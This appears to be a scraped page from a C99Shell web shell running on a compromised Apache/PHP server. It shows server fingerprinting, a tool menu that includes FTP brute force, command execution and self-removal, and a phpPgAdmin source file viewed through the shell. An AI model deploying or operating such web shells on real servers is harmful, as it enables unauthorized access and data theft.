!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/doku/axrepos/axess/phppgadmin/   drwxrwxr-x
Free 11.57 GB of 97.11 GB (11.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     casts.php (1.96 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
/**
     * Manage casts in a database
     *
     * $Id: casts.php,v 1.12.2.2 2007/07/09 14:55:21 xzilla Exp $
     */

    // Include application functions
    
include_once('./libraries/lib.inc.php');
    
    
$action = (isset($_REQUEST['action'])) ? $_REQUEST['action'] : '';
    if (!isset(
$msg)) $msg '';

    
/**
     * Show default list of casts in the database
     */
    
function doDefault($msg '') {
        global 
$data$misc$database;
        global 
$lang;

        function 
renderCastContext($val) {
            global 
$lang;
            switch (
$val) {
                case 
'e': return $lang['strno'];
                case 
'a': return $lang['strinassignment'];
                default: return 
$lang['stryes'];
            }
        }
        
        
$misc->printTrail('database');
        
$misc->printTabs('database','casts');
        
$misc->printMsg($msg);
        
        
$casts $data->getCasts();

        
$columns = array(
            
'source_type' => array(
                
'title' => $lang['strsourcetype'],
                
'field' => 'castsource',
            ),
            
'target_type' => array(
                
'title' => $lang['strtargettype'],
                
'field' => 'casttarget',
            ),
            
'function' => array(
                
'title' => $lang['strfunction'],
                
'field' => 'castfunc',
                
'params'=> array('null' => $lang['strbinarycompat']),
            ),
            
'implicit' => array(
                
'title' => $lang['strimplicit'],
                
'field' => 'castcontext',
                
'type'  => 'callback',
                
'params'=> array('function' => 'renderCastContext''align' => 'center'),
            ),
        );

        
$actions = array();
        
        
$misc->printTable($casts$columns$actions$lang['strnocasts']);
    }

    
/**
     * Generate XML for the browser tree.
     */
    
function doTree() {
        global 
$misc$data;
        
        
$casts $data->getCasts();
        
        
$proto concat(field('castsource'), ' AS 'field('casttarget'));
        
        
$attrs = array(
            
'text'   => $proto,
            
'icon'   => 'Cast'
        
);
        
        
$misc->printTreeXML($casts$attrs);
        exit;
    }
    
    if (
$action == 'tree'doTree();
    
    
$misc->printHeader($lang['strcasts']);
    
$misc->printBody();

    switch (
$action) {
        case 
'tree':
            
doTree();
            break;
        default:
            
doDefault();
            break;
    }    

    
$misc->printFooter();

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0205 ]--